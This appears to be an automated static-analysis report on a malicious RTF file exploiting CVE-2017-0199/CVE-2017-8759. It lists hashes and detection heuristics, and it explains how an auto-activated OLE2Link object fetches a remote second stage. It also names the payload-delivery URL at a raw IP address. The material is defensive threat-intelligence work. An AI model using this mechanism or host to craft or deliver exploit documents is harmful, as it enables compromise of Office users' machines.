Malicious RTF — malware analysis report

Static analysis result for SHA-256 a8128ed41ccba857…

MALICIOUS

RTF

559.0 KB Created: 2017-11-19 09:10:00 First seen: 2018-04-30
MD5: e5f5b9c00a5bbd89809dc28c960e242a SHA-1: ecbacb5429121a511958ceb70a634a1f6a9f08c5 SHA-256: a8128ed41ccba8574948cdb17e5719575cc1c82a047ed38c4d806d432ffb5521
402 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The RTF file contains OLE object data that leverages a remote loader, specifically indicating exploitation of CVE-2017-0199 or CVE-2017-8759. This mechanism is designed to download and execute a secondary payload from the specified URL. The presence of WinExec, CreateProcess, ShellExecute, and LoadLibrary API references further supports the execution of external code. The ClamAV detection confirms the malicious nature of the file.

Heuristics 11

  • CVE-2017-0199 / CVE-2017-8759 (OLE2Link auto-activated remote loader) critical CVE related RTF_OLE2LINK_REMOTE_MONIKER_LOADER
    RTF embeds an OLE2Link object that is force-activated with \objupdate (no user interaction on open) and fetches a remote second stage through an INCLUDETEXT/INCLUDEPICTURE field. This is the field-delivered OLE2Link auto-update attack path shared by CVE-2017-0199 (server returns an HTA/scriptlet) and CVE-2017-8759 (server returns a SOAP WSDL the .NET parser compiles). Office processes the fetched response through the same code path; the specific CVE depends on the now-unreachable server content type.
  • ClamAV: Rtf.Downloader.CVE_2017-6336326-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Rtf.Downloader.CVE_2017-6336326-3
  • Reference to WinExec API high SC_STR_WINEXEC
    Reference to WinExec API
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • \objupdate forces OLE activation high RTF_OBJUPDATE
    RTF contains \objupdate — forces automatic OLE object instantiation when the document is opened, bypassing user interaction. Almost exclusively seen in Equation Editor exploit documents.
  • INCLUDETEXT/INCLUDEPICTURE remote URL high RTF_INCLUDE_REMOTE
    RTF document uses INCLUDETEXT or INCLUDEPICTURE with an http:// URL — Word can fetch the remote content on open depending on Office version and external-content settings, enabling remote template injection, NTLM capture via redirects, or payload delivery
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • OLE object data medium RTF_OBJDATA
    RTF contains 2 \objdata section(s) — embedded OLE objects
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://109.245.221.126/POD/t.php?stats=send&thread=0 In RTF body
    • http://schemas.microsoft.com/office/word/2003/wordmlIn RTF body

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
objdata_00_off0000c568.bin rtf-objdata-decoded RTF \objdata at offset 0xC568 2598 bytes
SHA-256: 4667fb32fa2ee4c6570610bfbf2f7be3b710cfe8b8bf720240ba1d73442dd1dc
objdata_01_off0000dc96.bin rtf-objdata-decoded RTF \objdata at offset 0xDC96 2674 bytes
SHA-256: 4d3eef4e6280dd054ca7cb0549926de862d1fa26aea931b2984c8aec329bf281